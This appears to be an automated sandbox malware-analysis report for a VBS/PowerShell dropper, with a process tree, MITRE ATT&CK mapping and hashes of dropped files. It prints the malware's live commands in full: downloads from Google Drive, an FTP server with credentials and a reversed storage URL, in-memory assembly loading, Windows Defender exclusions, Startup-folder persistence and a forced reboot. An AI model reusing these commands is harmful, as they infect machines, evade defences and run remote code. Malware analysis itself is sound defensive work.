$bQOzu.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs');powershell $bQOzu
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3000
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $RpGJb = $host.Version.Major.Equals(2) ;if ($RpGJb) {$pasta = [System.IO.Path]::GetTempPath();del ($pasta + '\Upwin.msu');$hSAHp = 'https://drive.google.com/uc?export=download&id=';$HTYfv = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ($HTYfv) {$hSAHp = ($hSAHp + '112AdPfI0PC7hbsci_5_0_eU7NwMZhf4x') ;}else {$hSAHp = ($hSAHp + '1brj5jqnqRxCD6VhfhAn2rcVfsRo7D8gr') ;};$fwSYp = (New-Object Net.WebClient);$fwSYp.Encoding = [System.Text.Encoding]::UTF8;$fwSYp.DownloadFile($URLKB, $pasta + '\Upwin.msu');$FoldStartup = ('C:\Users\' + [Environment]::UserName );$file = ($pasta + '\Upwin.msu'); powershell.exe wusa.exe $file /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs' -Destination ( $FoldStartup + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$GAwZn;$CSaXQ = (New-Object Net.WebClient);$CSaXQ.Encoding = [System.Text.Encoding]::UTF8;$CSaXQ.Credentials = new-object System.Net.NetworkCredential('desckvbrat1','developerpro21578Jp@@');$GAwZn = $CSaXQ.DownloadString( 'ftp://[email protected]/Upcrypter/01/DLL01.txt' );$CSaXQ.dispose();$CSaXQ = (New-Object Net.WebClient);$CSaXQ.Encoding = [System.Text.Encoding]::UTF8;$GAwZn = $CSaXQ.DownloadString( $GAwZn );$hzwje = 'C:\Users\Admin\AppData\Local\Temp\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs';[Byte[]] $xXzmx = [System.Convert]::FromBase64String( $GAwZn.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $xXzmx ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( '83f81433f403-d2b9-a104-6542-0a02535e=nekot&aidem=tla?txt.reccoS/o/moc.topsppa.08965-epoh/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $hzwje , 'true1' ) );};"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:556
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2780
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4816
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c mkdir "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\"
      4⤵
      PID:3384
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Adds Run key to start application
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2044
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs"
      4⤵
      Drops startup file
      PID:4184
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs"
      4⤵
      PID:4884
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs"
      4⤵
      PID:756
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs"
      4⤵
      PID:4300
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs"
      4⤵
      PID:1352
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs"
      4⤵
      PID:3724
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs"
      4⤵
      PID:1792
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs"
      4⤵
      PID:1120
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs"
      4⤵
      PID:3944
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs"
      4⤵
      PID:4492
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs"
      4⤵
      PID:1508
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs"
      4⤵
      PID:3632
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs"
      4⤵
      PID:3728
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs"
      4⤵
      PID:3972
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs"
      4⤵
      PID:4508
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs"
      4⤵
      PID:1084
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs"
      4⤵
      PID:2040
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs"
      4⤵
      PID:2344
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs"
      4⤵
      PID:3308
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs"
      4⤵
      PID:748
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs"
      4⤵
      PID:3492
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs"
      4⤵
      PID:4804
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs"
      4⤵
      PID:4780
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs"
      4⤵
      PID:4388
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs"
      4⤵
      PID:1964
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs"
      4⤵
      PID:4292
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs"
      4⤵
      PID:456
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs"
      4⤵
      PID:2876
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs"
      4⤵
      PID:1536
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs"
      4⤵
      PID:3272
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs"
      4⤵
      PID:1888
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs"
      4⤵
      PID:2216
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs"
      4⤵
      PID:5080
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs"
      4⤵
      PID:3236
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs"
      4⤵
      PID:1472
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs"
      4⤵
      PID:2684
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs"
      4⤵
      PID:5092
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs"
      4⤵
      PID:2596
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs"
      4⤵
      PID:3356
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs"
      4⤵
      PID:396
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs"
      4⤵
      PID:4840
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs"
      4⤵
      PID:3264
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs"
      4⤵
      PID:3984
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs"
      4⤵
      PID:4080
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs"
      4⤵
      PID:2296
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs"
      4⤵
      PID:4040
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs"
      4⤵
      PID:4456
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\229051b5b85ba5aff1265ef5f953b89986b1343960c35550eae70170b1e6d2e1.vbs"
      4⤵
      PID:2636

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\x2.ps1

Filesize
336B

MD5
1d3d91d2dfceb29566803ecf7955f417

SHA1
a409e9ab4a35d27e1975916755489f2522a56a95

SHA256
9b513cfa4d98dbb6d8130fc216165d74740725a571b5dbf0c6c8c80852c1011b

SHA512
c4930f3e596770a21b2160a04ec467e1dda167d667d02ce5e1e6212999c96e4d2a6f0a96ec747e914c070f04c127ce76f1a4d49712fbf557f718fdf01692ebf4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\x2.txt

Filesize
355B

MD5
967eb55005b30c47f32376bc2bcfe01d

SHA1
4e0ef0d27139685f669c2d209517bbb76649a10e

SHA256
1b5d83bb7b160cf7af02f1fcd87dc47a851495339e98e1f3c369337c6b96a31f

SHA512
6d24c54302e9e9f3d8702037a83185279acac8fae1e93b798ad480148f63bee1a34d90c5c9a0da4c1571ed3d4b1d69033137027aac4b9ace9134f9a3a4546062

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d28a889fd956d5cb3accfbaf1143eb6f

SHA1
157ba54b365341f8ff06707d996b3635da8446f7

SHA256
21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

SHA512
0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_spglw42h.utw.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/556-22-0x000001E1F5BD0000-0x000001E1F5BDA000-memory.dmp

Filesize
40KB

Download
memory/3000-0-0x00007FFA10843000-0x00007FFA10845000-memory.dmp

Filesize
8KB

Download
memory/3000-10-0x00000213420F0000-0x0000021342112000-memory.dmp

Filesize
136KB

Download
memory/3000-11-0x00007FFA10840000-0x00007FFA11301000-memory.dmp

Filesize
10.8MB

Download
memory/3000-12-0x00007FFA10840000-0x00007FFA11301000-memory.dmp

Filesize
10.8MB

Download
memory/3000-62-0x00007FFA10843000-0x00007FFA10845000-memory.dmp

Filesize
8KB

Download
memory/3000-63-0x00007FFA10840000-0x00007FFA11301000-memory.dmp

Filesize
10.8MB

Download